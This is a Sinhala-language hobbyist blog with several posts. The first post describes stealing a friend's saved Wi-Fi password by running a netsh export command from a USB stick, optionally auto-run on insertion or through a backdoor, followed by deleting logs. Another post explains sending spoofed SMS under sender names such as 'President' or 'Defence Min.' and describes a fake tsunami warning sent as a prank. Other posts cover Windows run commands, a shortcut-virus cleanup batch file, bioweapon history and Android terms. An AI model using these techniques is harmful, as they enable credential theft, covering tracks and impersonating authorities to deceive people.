Search This Blog

Wednesday, May 6, 2015

WIFI password cracking part - 1

WIFI password cracking part - 1

කාලෙකින් නූලක් දාන්නේ.  wifi password crack කරගන්න විදියක් තමා කියන්‍න යන්නේ. මේ part 1 තව 4ක් 5ක් ගියාම සිරා විදියටම crack කරන හැටි කියලා දෙන්නම්.. මේ ගැන වැඩි විස්තර K_ZONE සහෝදරයා දාල තිබ්බා බලන්න.

part 1 හිංදා පොඩි සීන් එකක්. මේකෙදී කරන්නේ අදුරන කාගෙ හරි Lap එකින් password එක ගන්න එක..

උදා :
යාළුවෙක් ඉන්නවා උෟ pass දෙන්නේ නෑ. ඒත් උගේ ලැප් එක use කරන්න පුළුවං Guest උනත් අව්ලක් නෑ. උගේ Lap එකට පෙන් එක ගහලා යට තියෙන attachment එක රන් කරන්න එතකොට pen ඒකේ .XML ඇති SSID name එකෙන්. ඒක notepad එකෙන් open කරන්න එ‍්කේ <keyMaterial> කියන තැන ඇති password එක. ඕන්නම් autorun.inf වලට දාන්න එතකොට pen එක ගැහුව ගමන් බඩු ඇතුලේ.. මේක Malware එකක් නෙමේ virus guard වලින් අල්ලන්නේ නෑ 


Technical details :

PHP Code:
netsh wlan export profile interface=wi-fi key=clear  
බැක්-ඩෝර් එකක command එකක් විදියට execute කරන්නත් පුළුවං  එතොකොට මතක ඇතුව path එකක් use කරන්න. Logs මකන්න නැත්තම් ඉතිං වෙන දේ කියන්න ඕන නෑනේ 

PHP Code:
 netsh wlan export profile interface=wi-fi key=clear  folder="%temp% or you RHOST path"  

Tuesday, May 5, 2015

වින්ඩෝස් රන් කමාන්ඩ්ස් කීපයක් මෙන්න



උඹල දන්නව නේ Run dialog box එක.

Run dialog box ගන්ඩ පුලුවං “Win + R” ටයිප් කරල
නැත්තං “Win + X” ටයිප් කළාම එනව මෙනු එකක්. ඒකෙ හැමදෙයක්ම තියෙනව

මෙන්න වැදගත් කමාන්ඩ්ස් කීපයක්

1. “\” මේකෙන් සී ඩ්‍රයිව් එකට යන්ඩ පුලුවං 

2. “.” උඹලගෙ පෞද්ගලික යූසර් ෆෝල්ඩරේට යනව

3. “..” ඉන්න ඔක්කොම යූසර්ලගෙ ෆෝල්ඩරේට යනව. (උඹල මේ රන් කමාන්ඩ් ටිකනං දැනං හිටියෙ නෑ නේ...) 

4. mrt මේක ගොඩක් වැදගත් කමාන්ඩ් එකක්. ටයිප් කරල රන් කරල බලන්ඩ. පොඩි මැල්වෙයා ස්කෑන් එකක්.. හැබැයි වින්ඩෝස් අප්ඩේට් සක්‍රීය කරල තියෙනවනං තමා ප්‍රතිඵලයක් ලැබෙන්නෙ. වින්ඩෝස් අප්ඩේට් චෙක් කරද්දි දැකල තියෙනව නේ, Malicious Software Removal Tool කියල. මේක තමා මේ සකෑන් එකට උදව් වෙන්නෙ.. හරියට වයිරස් ගාඩ් එකක ඩෙෆිනිෂන්ස් අප්ඩේට් වෙනව වගේ...

5. regedit මේකනං ගොඩක් අය දන්නව. වින්ඩෝස් රෙජිස්ට්‍රියට කෙළින්ම යන්ඩ පුලුවං

6. msconfig මේකත් ගොඩක් වැදගත් වෙන කමාන්ඩ් එකක්.. ට්‍රයි කරලම බලන්ඩ.

7. msinfo32 ගොඩක්ම වැදගත් කමාන්ඩ් එකක්. සමහරක් අයගෙන කම්පියුටරේ ගැන විස්තර ඇහුවම උඩ බිම බලනව.. මෙතනට ගියාම ඔයාලගෙ කම්පියුටරේ ගැන සියලුම විස්තර බලාගන්ඩ පුලුවං..

8. DxDiag ට්‍රයි කරලම බලන්ඩ 

9. wuapp කන්ට්‍රෝල් පැනල් එකේ වින්ඩෝස් අප්ඩේට් 

10. sysdm.cpl – System Properties window එකට යන්ඩ පුලුවං

වැඩිය දන්නෙ නැති, ගොඩක් වැදගත් වෙන රන් කමාන්ඩ්ස් කීපයක් තමා මම ඔය දැම්මෙ..

Friday, April 24, 2015

shortcut virus එකෙන් තාමත් වද විදිනවාද මෙන්න ඒකට Notepad පට්ට වැඩ කෑල්ලක්


shortcut virus එකෙන් තාමත් වද විදිනවාද මෙන්න ඒකට Notepad පට්ට වැඩ කෑල්ලක් 

මෙම වයිරස් එක බොහො දුරට pen drive එකෙ හැදෙන වයිරස් එකක් මෙකෙන් වෙන්නේ pen drive එකේ තියෙන files පෙන්නන්නේ shortcut විදියට එක නිසා pen drive එකේ තියෙන කිසිවක් pc එකට copy කරන්න බෑ.......මෙක නැති කරන්න කරන්න තියෙන්නේ පොඩි වැඩයි. ඉස්සෙල්ලා Notepad open කරගෙන පහළ තියෙන code ටික copy කරගන්නකෝ...

echo off
color 9f
cls
echo.
echo.
echo.
echo.
echo ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++
echo ++ ++
echo ++ ++
echo ++ *** ShortCut Virus Remover *** ++
echo ++ ++
echo ++ ++
echo ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++
echo.
echo.
echo Recommend only to use in Flash drives.
echo.
echo If this file is on your Desktop it will badly affect to your Desktop Icons !!!
echo.
echo.
echo.
echo.
echo Shortcut Virus Remover is going to repair your Flash drive..........
echo.
pause
cls
echo.
echo.
echo.
echo.
echo Cleaning process will take few seconds..........
echo Please wait..........
echo.
echo.
echo.
del *.lnk
del fypuas.exe
del fypuasx.exe
cls
echo.
echo.
echo Removing Shortcuts........... Complete.
echo.
echo.
echo.
echo Make visible your folder........... is in process..........
echo This process will take few minutes..........
echo.
echo Please wait..........
attrib /s /d -s -h -r *.*
cls
echo.
echo.
echo.
echo Shortcut Virus Remover finish its Job.........
echo.
echo Your Flash drive is OK now
echo.
echo.
echo.
echo Check your Flash drive for unknown files and folders.
echo If there is any, delete them.
echo.
echo.
echo.
echo.
echo.
echo.
echo Cleaning Process Complete.
echo.
echo.
echo Developed by Hera.......
echo.
echo.
echo.
pause

මෙක save කරද්දී කැමති නමක් දීලා අගට .bat කියලා දීලා save කරන්න. හදාගත්ත file එක open කරන්න.
ඊට පස්සේ keyboard එකේ කැමති key එකක් දෙපාරක් ඔබන්න
දැන් වැඩෙ හරි!!!!!!
*from web

Tuesday, April 21, 2015

ලොව භයානකම ජෛව අවි 10





10 . Smallpox - වසූරියබ්‍රිතන්‍ය හමුදාවේ කමාන්ඩර් ජෙෆ්රි අමෙර්ස්ට්(Jeffrey Amherst) ගේ අණපරිදි උතුරු ඇමෙරිකා මහාද්වීපයේ ආදිවාසීන්වූ රතු ඉන්දියානුවන් වෙත වසූරිය බීජ ඇතුලත් පොරෝනයන් බෙදාදී ඇත. මෙය සිදුවී ඇත්තේ 18 වන සියවසේදී කැනඩාවේ (Ottawa) හිදීය. මෙමගින් පැතිරුණ වසූරිය වසංගතය රතු ඉන්දියානු ජනගහණයට බරපතල හානි සිදුකරන ලදී.

09. Anthrax

2001 එලබීමත් සමගම එක්සත් ජනපදයේ සෙනෙට් සභිකයන් හා මාධ්‍ය ආයතන කිහිපයකට තැපැල් මගින් පැමිණි මාරාන්තික සුදු කුඩක් හේතුවෙන් ලොවම බියට පත්විය. මෙය මාරාන්තික බැක්ටීරියාවක් වන Bacillus anthracis ය. සමෙන් මෙන්ම ආශ්වසයෙන්ද සිරුරට ඇතුළුවන මෙම බැක්ටීරියාවෙන් සිරුරෙහි ප්‍රධාන අවයව අඩපනකර මරණය ගෙනදෙයි. 1930 දී ජපාන විද්‍යාඥයින් මෙම අවිය පිලිබදව පර්යේෂණ පවත්වා ඇත. 1942 දී බ්‍රිතන්‍ය හමුදාව Anthrax බෝම්බ පිලිබදව පරීක්ෂණ පවත්වා ඇත. 1979 දී රුසියානු හමුදාව සතුව තිබු වාතය මගින් පැතිරෙන Anthrax විශේෂයක් කාන්දුවීම හේතුවෙන් 66 දෙනෙකු ජීවිතක්ෂයට පත්විය.

08. Ebola Virus

මේ දිනවල කතාබහට ලක්වී ඇති ඉබෝලා වයිරසය මගින් සිරුරෙහි රක්තපාත උණ වර්ගයන් ඇතිකරයි. මෙයින් සිරුරෙහි අභ්‍යන්තර ලේගැලීම් ඇතිවී ප්‍රධාන අවයව අඩපන වීමෙන් මරණය ඇතිවේ. මෙය 1970 දී සිවිල් ගැටුම් පැවති අප්‍රිකාවේ සයරේ රාජ්‍යයේ මුල්වරට පැතිරීමෙන් සිය ගණනක් මරණයට පත්විය. අනතුරුව විවිධ ගැටුම් පැවති අප්‍රිකානු රටවල් ගණනාවකින් මෙන්ම යුරෝපයේ හා එක්සත් ජනපදයේ රෝහල් ගණනාවක් තුලින්ද වරින් වර මතුවිය. ඉබෝලා වයිරසය කොංගෝවේ කොල වදුරන්ගෙන් ආරම්භවූ බවට සුරංගනා කතාවක් පතුරුවා ඇතිනමුත් කොලවදුරන්ට මෙය මිනිසුන් විසින් ලබාදුන් බවට සාධක තිබේ. 1990දී රුසියානු පර්යේෂකයින් ඉබෝලා වයිරසය අවියක් ලෙසට වැඩිදියුණු කිරීමට උත්සහකර ඇත. එනම් එය වාතය මගින් ඉක්මනින් පැතිරවිය හැකි ආකාරය පිළිබදවය. පසුගිය කාලයේ අප්‍රිකාවේ සේවය කිරීමේදී ඉබෝලා වයිරසයට ගොදුරුවූ ඇමෙරිකානු විද්‍යාඥයින් දෙදෙනා එක්සත් ජනපදයට ගෙන්වාගත් පසුව පැය 24න් සුවපත්වුයේ කෙසේදැයි මෙතෙක් හෙළිකර නැත.

07. Plague - මහාමාරිය

14 සියවසේදී යුරෝපයේ පැතිරුණ දරුණුතම වසංගතයයි. 1940දී ජපානය විසින් චීනය ආක්‍රමණය කිරීමේදී මෙම රෝගබීජයන් අඩංගු ගෝනි හා මලු දහස් ගණනක් ගුවන්යානා මගින් චීනයට හෙලා ඇත.

06. Tularemia
Francisella tularensis යන බැක්ටීරියාව මගින් මෙම රෝගී තත්වය ඇතිවේ. මෙය සිරුර අඩපන කරන සති 2-3 පවතින උණකි. ප්‍රතිකාර නොකළහොත් මාරාන්තිකය. මෙය සතුන්ටද බලපාන බැක්ටීරියාවකි. 1941 ජර්මානු හමුදාව රුසියාව ආක්‍රමණය කල අවස්ථාවේදී මෙය භාවිත කිරීමෙන් රුසියානු සෙබළුන් ලක්ෂ ගණනක් රෝගාතුරවී ඇත. දෙවැනි ලෝක යුද්ධයේ අවසන් සමයේදී ලෝක බලවතුන් සියල්ලම මෙය අවියක් ලෙස තවදුරටත් වැඩිදියුණු කිරීමේ නියැලෙමින් සිට ඇත.

05. Botulinum Toxin

මෙය ඉතාම භයානක විෂ වර්ගයකි. පැහැයක්, ගද සුවදක් නොමැති හෙයින්,ආශ්වාසය මගින් සිරුරට ඇතුළුවූ බව දැනගැනීමට නොහැක. පැය 24 - 72 අතර මරණය ගෙන දෙයි. 1990දී Shoko Asahara නමැති ජපාන ආගමික කල්ලියක නායකයෙකු විසින් දේශපාලනික ඉලක්කයන් කිහිපයකට මෙමගින් පහර දී ඇත.

04. Rice Blasts

මෙම අවිය රුසියාව, එක්සත් ජනපදය, බ්‍රිතන්‍ය හා චීනය ප්‍රධාන වශයෙන් වැඩිදුර අත්හදා බලමින් පවතිනු ලැබේ. මෙම වයිරසයන්ගෙන් හානි සිදුවන්නේ මිනිසුන්ට නොව ඔවුන්ගේ ආහාර වගාවන්ටය. මෙමගින් සතුරන්ගේ ආහාර සැපයුම් අඩාල කිරීම අරමුණවේ. එක්සත් ජනපද හමුදාවන් විසින් මෙය වියට්නාම් යුද්ධයේදී භාවිතකර ඇත.

03. Rinderpest

මෙය 13 වන සියවසේදී යුරෝපය ආක්‍රමණය කල ''ජෙන්ගිස් කාන්'' විසින් යොදාගෙන ඇත. මෙය වැළදෙන්නේ ප්‍රධාන වශයෙන්ම ගවයන්ට හා එළුව්න්ටය. වැළදී දින 6 -10 අතර මරණයට පත්වේ. අරමුණ වන්නේ සතුරන්ගේ ආහාර සැපයුම් අඩාල කිරීමයි. එක්සත් ජනපදය හා කැනඩාව මෙම අවිය වැඩිදියුණු කරමින් සිටී.

02. Nipah Virus

මෙය C කාණ්ඩයේ ජීවවිද්‍යා අවියකි. භයානක වන්නේ, මෙය මිනිසාගෙන් මිනිසාට හා සතුන්ටද, සතුන්ගෙන් මිනිසාටද පැතිරීමයි. 1999 ඉන්දුනීසියාවේ ''නිපා'' ප්‍රාන්තයේ හදිසියේම 265 කට වැලදී 105 මියගොස් ඇත. එය යම් බලවත් රටකින් කල පර්යේෂණයක් බවට සැක කරයි.


01. Chimera Viruses

කයිමේරා වයිරසයන් යනු ලොව පවතින භයානකම වයිරසයන්ගේ ජාන සංයුතියන් වෙනස් කරමින් හා ඒවා එක්කරමින් නිපදවන සුපිරි ගනයේ විනාශකාරී වයිරසයන්ය. 1980 අගභාගයේදී සෝවියට් දේශයේදී, වසූරිය හා ඉබෝලා වයිරසයන් එකට එක්කර සුපිරි වයිරසයක් නිපදවීමේ ව්‍යාපෘතියක් ක්‍රියාත්මකවී තිබේ. අදට ලෝක බලවතුන් සියල්ලන්ම කයිමේරා වයිරසයන් නිපදවීමේ පර්යේෂණයන්ගේ නිරතවෙමින් පසුවේ. මෙවැනි භයංකර ජීව අවි භාවිත කරන ලෝක යුද්ධයක් ඇතිවුනහොත් ලෝක ජනගහණයෙන් 2/3 පමණ මියයනු ඇතැයි විශ්ලේෂකයින් පවසයි.

Wednesday, April 8, 2015

ඔන්න නියම වැඩ කැලි දෙකක්

ඔන්න නියම වැඩ කැලි දෙකක් ගෙනාව අදත්,,,,
මටත් කොල්ලෙක් තමා කිවේ....
පට්ටම පටට....
එහෙනම් පටාන් ගමු....

මුලින්ම තියෙන්නේ අපේ වැඩ ලේසි කර ගන්න දෙයක්... අපි අපේ පරිගණකයේ සෙටින්ග්ස් හදන්න එක එක තැන් වලට යනවනේ.... කන්ට්‍රෝල් පැනල, අරව මේවා....
කොහොමද මේ ඔක්කොම එකම තැනකින් කර ගන්න තියෙනවා නම්....
අන්න එකයි අද කරන්න යන්නේ...
වෙනම සොෆ්ට්වෙය දාන්න ඕනේ නැ,
ක්‍රැක් කරලා පවු පුරවා ගන්න ඕනේ නැ,
ස්පීඩ් අඩු වෙන් නැ,,,,
අපිමයි මේක හදන්නේ.....

ඔන්න එහෙනම් පටන් ගමු...
මුලින්ම හදන්න ඩෙක්ස්ටොප් එකේ new folder එකක්.... 
දැන් එක rename කරන්න God-Mode.{ED7BA470-8E54-465E-825C-99712043E01C} කියලා..... මේක කොපි කරලා දාන්න... නැත්නම් වරදීවි....
දැන් එන්ටර් ඔබලා rename කරන එක ඉවර කරන්න...
දැන් open කරලා බලන්න....
ඔන්න බඩු හරි....
ඔකකොම එක තැන....


ඔන්න තව එකක්....
මේක ඊටත් වඩා පට්ට....
මතකද අර අලුත් අවුරුද්දට එහෙම ජනාදිපති අපිට මැසේජ් එකක් එවන්නේ,,,,
persident කියලා නම්බර් එකකින්.... 
අන්න ඒ වගේ මැසේජ් යවන්න විදිහක් තමා කියන්න යන්නේ...
මුලින්ම යන්න https://www.smsglobal.com
කියන සයිට් එකට....
හදාගන්න ඔකේ account එකක්...
අනිත් ඒවගේ වගේම කිසිම අවුලක් නැතිව හදා ගන්න පුළුවන්.
තමන්ගේ නම්බර් එක අහන තැනට තමන්ගේම එකක් දෙන්න,
මොකද පාස්වර්ඩ් එක එවන්නේ ෆෝන් එකට... 
දැන් එහෙනම් ආපු පාස්වර්ඩ් එකත් එක්ක ලොග් වෙන්න...

වම අත පැත්තේ මෙහෙම එකක් ඇති...
මෙන්න මෙතන තියෙන මේ කහ පාටින් දාල තියෙන එක ක්ලික් කරන්න...




දැන් මෙහෙම එකක් එයි,,,



දැන් මුලින්ම දාන්න අපිට යවන්න ඕනේ නම්බර් එක...
ඉලගට Sender ID From: කියන තම දාන්න මොන විදිහටද යවන්න ඕනේ කියලා...
ඒ කියන්නේ තමන්ට කැමැති නම්බර් එකක් හරි, නමක් හරි....
උදා: President

Message Template: මේක මොකුත් කරන්න එපා...

දැන් හිතේ හැටියට මැසේජ් එක ගහලා යවන්න තමා තියෙන්නේ....
ඕනේ නම් ටයිම් තියලා යවන්නත් පුළුවන්....

මම චෙක් කරන්නත් එක්ක මෙහෙම වැඩක් කළා....

Sender ID From: කියන එකට දැම්ම Defence Min. (Defence Ministry) කියලා....

මැසේජ් එකට මෙහෙම දැම්ම...

A 9.8 earthquake was happed in Japan and tsunami warnings were releases. Please be careful කියලා....

වැරදි වැඩක් තමා...
විහිලුවට වගේ දැම්මේ මගේ රුමට....
මෙන්න මු දුවගෙන එනවා...
මම දන ගත්ත වැඩේ හරි කියල....

හැබැයි මචන් වැඩදා කියන්නම් නරක දෙකට නම් මේක යොදා ගන්න එපා....
මේකෙන් ආතල් ගත්තට කමක් නැ, 
පමණ ඉක්මවලා යන්න එපා.....
උබලත් මේක හොද දෙකට පාවිච්චි කරපල්ලා.......

එහෙනම් අපි කැපුනා......

මොනවා හරි කියාගෙන පලයල්ලා.....

තව එකක් , තව එකෙක්ට දැම්මා උට මොබිටෙල් එකෙන් කාර් එකක් හම්බෙලා කියල...
ආතල් ලෝකයයි.....


එහෙනම් අපි කැපුනා.....

මොනවම හරි කියාගෙන පලයල්ලා....
නැත්නම් මම ඒවනවා උබලට මැසේජ් එකක්....

Monday, March 23, 2015

ඇන්ඩ්‍රොයිඩ් ගැන ඇත්තටම දන්නවද?

කාගෙන්හරි ෆෝන් එකක් තියෙනවද කියලා ඇහුවොත් 99%කගෙම උත්තරේ ඔව්.ඒ අයගෙනුත් සෑහෙන්න පිරිසක් ලඟ තියෙන්නේ ඇන්ඩ්‍රොයිඩ් ෆෝන් එකක් කිව්වොත් ඒකත් හරි.ඉතින් කවදහරි හිතිලා තියෙනවද අපෝ මගේ ෆෝන් එකේ තව කරන්න,දැනගන්න දෙයක් නෑ මම මගේ ෆෝන් එක කාලා තියෙන්නේ මම ඒ ගැන ඕනම දෙයක් දන්නවා කියලා.එහෙමනම් මෙන්න මේවට උත්තර දීලා බලන්න තමන්ගේ ෆෝන් එක ගැන තමන් කොච්චර දුරට දන්නවද කියලා.මම මෙතන දාන දේවල් ගොඩක් වැදගත් වේවි samsung වගේ highly customizable ෆෝන් තියෙන අයට.අනිත් අයටත් වැදගත් වේවි, බැලුවට කිසි පාඩුවක් වෙන එකක් නෑ හොඳේ. හැමෝම දැනටමත් දන්නවා ඇතිනේ ඇන්ඩ්‍රොයිඩ් ෆෝන් එකක් රූට් කරන හැටි නම්.තව Odin සොෆ්ට්වෙයා එක ගැන එහෙමත් අහලා ඇතිනේ.එහෙනම් දන්න නොදන්න හැමෝටමත් එක්ක දැනගන්න මම මේ නූලෙන් ඇන්ඩ්‍රොයිඩ් ෆෝන් එකක අපි දන්න/නොදන්න කරුණු කාරණා දිගටම දාන්නම්. 01.මේ ඔඩින්(Odin) කියන්නෙ මොකද්ද? අහලා ඇති මේ ගොඩක් අය ඔඩින් ඔඩින් කියලා සොෆ්ට්වෙයා එකක් ගැන කියනවා.ඇත්තටම ඔඩින් කියන්නේ samsung සමාගමෙන් වැරදීමකින් අන්තර්ජාලයට එක්වුණු එහෙම නැත්නම් leaked software එකක්.samsung සමාගම මේක පාවිච්චි කරන්නේ ඇන්ඩ්‍රොයිඩ් ඩිවයිස් එකකට firmware/os/kernel/radio's වගේ දේවල් "flash"(ඇතුලත්) කරන්න.මේකෙන් ඔයාගේ ෆෝන් එකේ ඕනම අනතුරුදායක තැනකට කලින් කිව්ව firmware/kernels වගේ දේවල් flash කරන්න පුළුවන්කම තියෙන නිසා මේ Odin අපි භාවිතා කරනකොට බොහොම ප්‍රවේශම් වෙන්න ඕනේ.නැත්නම් ෆෝන් එකට sorry.com තමා.ඒ කිව්වේ ෆෝන් එක soft හෝ hard "brick" වෙන්න පුළුවන්.ඔඩින් ගැන කියන්න තව ගොඩක් දේවල් තියෙනවා.දැනට මේ විස්තරේ විතරක් දාන්නම්.මේ නූල දිගට කරන්න බලාපොරොත්තුවක් තියෙන නිසා පස්සේ තව විස්තර දාන්නම්. 02.මොකද්ද මේ Brick(hard/soft) වෙනවා කියන්නේ? (Brick = ගඩොල), ෆෝන් එක ගඩොලක් වෙනවා කියන තේරුමම තමයි.මොකද ගඩොලක් අපිට on කරන්න බැරි නිසා.මෙන්න මේ සිද්ධියම තමයි මෙතනදිත් වෙන්නේ.ෆෝන් එකට නොගැලපෙන යම් firmware/kernel වගේ flash කලාම ෆෝන් එක ආපහු on නොවෙන තත්වයට පත්වෙනවා.මේක තාවකාලික වගේම සදාකාලික වෙන්න ඉඩකඩ තියෙනවා. Soft Brick --> කියන්නේ ෆෝන් එක "boot loop" එකක දිගටම තියෙන එක.ඒ කියන්නේ boot නොවී samsung හෝ අදාල ෆෝන් වර්ගයේ boot logo එකේ දිගටම නතර වෙලා තියෙන එකයි.හරියට windows 7 කියලා වැටිලා computer එක ඔන් නොවී තියෙනවා වගේ තමා.මේක තාවකාලිකයි.ඒ කියන්නේ අපට ඇන්ඩ්‍රොයිඩ් ගැන හොඳ දැනුමක් තියෙනවා නම් boot loop එකකට යන්න සිද්ධ වුණේ මොකක් නිසාද කියලා හොයලා ඒකට පිළියමක් යොදන්න පුළුවන්. ඒ කියන්නේ boot loop එකට ගියේ අලුතින් flash කරපු kernel එකක් නිසා නම් අපිට පුළුවන් ආපහු හරි kernel එක internet එකේ search කරලා flash කිරීමෙන් බොහොම පහසුවෙන් ආපහු home screen එකට ෆෝන් එක boot කරගන්න.ගොඩක් අය නම් කරන්නේ සල්ලි දහස් ගණන් දීලා ආයෙමත් software ගහන එක(flashing software).අයියෝ සල්ලි. Hard Brick --> කියන්නෙ නම් පුතෝ ගොඩක් දරුණු කේස් එකක්.මොකද මෙහෙම වුණු ෆෝන් එකක් අඩේකට තියනවා මිසක් ගොඩ ගන්න නම් ටිකක් අමාරුයි.ඉතින් මුලින්ම කියන්න තියෙන්නේ ලොකු ගණන් වලට ගත්තු ෆෝන් වලට නම් ලොක්කෝ වගේ වැඩි වැඩ දාන්න ගිහින් වියදම් කරපු සල්ලි සේරම නාස්ති කරගන්න එපා කියලා ඕන්.දැන ගියොත් කතරගම නැත්තම් අතරමඟ කියන්නේ නිකම් නෙවෙයිනේ. 03.මොකද්ද මේ Download Mode කියන්නේ? වැරදිලාහරි ඔයාගේ samsung ෆෝන් එක ඕෆ් කරලා ඔන් වෙද්දී ඔබන් ඉඳලා තියෙනවා නම් මේක දැකලා ඇති.මේක පාවිච්චි කරන්නේ official විදියට radio firmware[radio?? මොකක්?? -->පහළ (04) වෙනි එක බලන්න තේරෙයි] හෝ ROM upgrade/downgrade [පහළ (05) බලන්න] කරන්නයි. 04.මොකද්ද එතකොට මේ Radio firmware කියන්නේ? මේකට කියන තවත් නමක් තමයි "baseband" එක.බලාගන්න ඕන නම් settings->about device එකේ පහළට යනකොට ඇති "Baseband Version" කියලා.මේක radio සම්බන්ධ දෙයක් නම් නෙවෙයි හොඳේ.මේකෙන් තමයි ඔයාගේ ෆෝන් එකේ Network connectivity, Wi-Fi, GPS වගේ දේවල් පාලනය කෙරෙන්නේ.සාමාන්‍යයෙන් baseband upgrade කිරීමෙන් අපිට අලුත් features මොනවත් ලැබෙන්නේ නෑ.නමුත් ඒකෙන් connectivity issues වලට පිළියම් වගේම network range එක වැඩි කරගන්න සහ battery usage එක අඩු කරගන්න පුළුවන්. 05.ROM එකක් කියන්නේ මොකද්ද? ROM එකක් OS එකකට බොහෝදුරට සමාන වෙනවා.අපි custom ROM flashing කියලා කරන්නේ official නොවන වෙනත් වර්ගයක හෝ එම වර්ගයේම, වෙනත් developer කෙනෙක් විසින් හඳුන්වාදුන් ROM එකක් flash කිරීමයි.හරියටම කිව්වොත් windows වෙනුවට වෙනත් අයෙක් නිර්මාණය කරපු අලුත් OS එකක් install කරනවා වගේ තමයි.මේ වගේ විවිධ ROM වර්ග දැන් බොහෝ developers ලා develop කරලා තියෙනවා.http://forum.xda-developers.com මෙන්න මේ සයිට් එකට ගිහින් ඔයාලගේ ෆෝන් වර්ගය දීලා බලන්න මොනතරම් නම් custom ROMs මේකේ තියෙනවද කියලා.බැලුවට කමක් නෑ දන්නේ නැත්නම් flash කරන්න යන්න නම් එපා පුතෝ.Custom ROM flash කරන්න නම් ෆෝන් එකේ bootloader unlocked වී තිබීම හා root කර තිබීම අනිවාර්‍යයි.Custom ROM විවිධ වර්ග තියෙනවා,අහල තියෙනවද දන්නේ නෑ cyanogenmod(cm) ගැන.අහලා ඇති නේද.මේක බොහොම ප්‍රසිද්ධ AOSP(Android Open Source Project) ROM එකක්.හැබැයි ඉතින් මගේ S4 එකටනම් මම දාන්න කැමති samsung official TouchWiz User Interface එක තියෙන TouchWiz(tw) custom ROM තමයි.අනිත් ඒවත් flash කරලා පාවිච්චි කරලා තියෙනවා.ඒක ඉතින් එක එක්කෙනාගේ කැමැත්ත අනුව වෙනස් වෙනවා.තව GPE(Google Play Edition) ROM එහෙමත් තියෙනවා.මේකත් AOSP වර්ගයේ Open Source ROM එකක්.මේවගෙ තියෙන වෙනස්කම්, වැඩි විස්තර මේ නූලෙම පස්සේ දාන්නම් හොඳේ.එතකම් ඉවසන්න අමාරු ගොයියෙක් ඉන්නවනම් ඉතින් Google දෙයියගේ පිහිට පැතුවට කමක් නෑ. මෙන්න මේකත් දනගත්තට කමක් නෑ හොඳේ, එක සමීක්ෂණයකින් හෙළි වෙලා තියෙනවා ඇන්ඩ්‍රොයිඩ් ෆෝන් තියෙන 80%ක්ම පාවිච්චි කරන්නේ root නොකරපු ෆෝන් කියලා.ගොඩක් අය root කියන වචනේ දන්නෙත් නැතිලු, සමහර අය හිතන්නේ root කරන එක වැරැද්දක් හෝ අපරාධයක් කියලලු, තවත් අය හිතන්නේ root කරන්න ගිහින් ෆෝන් එක brick වෙයි කියලලු.නමුත් මේ root කරන්නේ මොකටද, ඒකෙන් ලැබෙන වාසි මොනවද කියලා මේ කවුරුත් නොදන්න එක තමයි තියෙන ගැටළුව.හරි root ගැනත් පස්සේ මේ නූලෙන්ම කියල දෙන්නම්කෝ.මගේ ප්‍රශ්නය තමයි ඇන්ඩ්‍රොයිඩ් කියන්නේ Open Source OS එකක් නම් ඇයි අපි ඒක අපට අවශ්‍ය විදියට customize කර නොගන්නේ කියන එක. 06.Bootloader කියන්නේ මොකද්ද? මේකෙන් තමයි ඔයාගේ ෆෝන් එක මූලික අවස්ථාවට බූට් කරන්නේ.ඒ කියන්නේ මේකෙන් ඔයාගේ ෆෝන් එක kernel එක execute කරන්න පෙර අවස්ථාවට බූට් කිරීම සිද්ධ කරනවා.පහළ පින්තූරෙ බැලුවම තේරෙයි.වැඩි විස්තර දැනගන්න උවමනා නම් මේකෙන් බලන්න.http://forum.xda-developers.com/wiki/Bootloader සමහර ෆෝන් වල bootloader locked.Sony වල එහෙම සමහර වෙලාවට මේවා locked.බලාගන්න ඕන නම් මෙන්න මේ code එක dialer එකේ ටයිප් කරන්න.[(*#*#7378423#*#*-->Service Info-->Configuration) මේකේ මෙහෙම තියෙනවද බලන්න: Bootloader unlock allowed - Yes <<මෙහෙම තියෙනවනම් locked>> Bootloader Unlocked - Yes <<මෙහෙම තියෙනවනම් unlocked>>] samsung වල bootloader කොහොමත් unocked නිසා ප්‍රශ්නයක් නෑ. 07.Kernel එකක් කියන්නේ මොකද්ද? kernel එක කියන්නේ ඔයාගේ ෆෝන් එකේ OS එක සහ hardware එකට සම්බන්ධ කරන link එකයි.සාමාන්‍යයෙන් ඇන්ඩ්‍රොයිඩ් ෆෝන් වල පාවිච්චි වෙන්නේ linux kernel එකක්.මේකත් ඔයාලට බලාගන්න පුළුවන් settings-->about device එකේ පහළට යනකොට තියෙන Kernel Version කියන තැනින්.අපි ෆෝන් එකට අලුතින් ROM එකක් flash කරනකොට ඒ ROM එකේ තියෙන kernel එකත් ROM එකත් එක්කම install වෙනවා.ඇත්තටම මේ kernel වලින් ගොඩක් ප්‍රයෝජන තියෙනවා.හැබැයි ඒවා ගන්න නම් custom kernel එකක් flash කරගන්න වෙනවා.මේක නම් බොහොම ලේසි වැඩක්.Custom recovery mode එකකින් ලේසියෙන්ම flash කරගන්න පුළුවන්.kernel එකකින් නිවැරදිව වැඩ ගන්න නම් kernel tweaking tool එකක් ඕන වෙනවා.උදාහරණ විදියට Stweaks/Trickster MOD/Synapse වගේ ඒවා ගන්න පුළුවන්.අපි custom kernel flash කරනකොටම මේ සමහර tools install වෙනවා.මේ tool වලින් processor max/min speed වගේම cpu voltages/gpu settings/gpu voltages, වගේ ගොඩක් දේවල් අඩු වැඩි කරගෙන battery life එක උපරිම කරගන්න පුළුවන්.ආ ඇයි හොඳම දේ තමයි මේකේ තියෙනවා "Fast Charge" facility එක.ඒකෙන් ෆෝන් එකේ charging voltages වෙනස් කරලා ඉක්මණට charge කරනවා.මේකෙ කිසිම අතුරු ආබාධයක් නෑ.අත්දැකීමෙන් කියන්නේ.තව මේ fast charge එක අපිට USB හරහා pc හෝ lap එකෙන් charge කරනකොටත් අපේ original charger එකෙන් charge කරනකොට ගන්න voltage එකම USB එකෙනුත් ලබා දෙනවා.ඉතින් charger එකෙන් charge කරනවා හා සමානව ඉක්මණට ෆෝන් එක charge වෙනවා.නැත්තම් USB charge වෙන්න යන වෙලාව charger එකෙන් charge කරනවට වඩා වැඩියින්.වැරදි kernel එකක් flash කලාම ෆෝන් එක boot loop එකකට ගිහින් soft brick වෙනවා කියන එකත් අමතක කරන්න එපා හොඳේ.kernel flash කරන හැටිත් අනිත් දේවල් එක්කම පස්සේ කියලා දෙන්නම් හොඳේ. 08.Recovery Mode කියන්නේ මොකද්ද? මෙන්න මේක නම් ඔයාලා ගොඩදෙනෙක් අහලා දැකලා තියෙන දෙයක්.ෆෝන් එක ඕෆ් කරලා ඔබාගෙන හිටියොත් recovery mode එකට 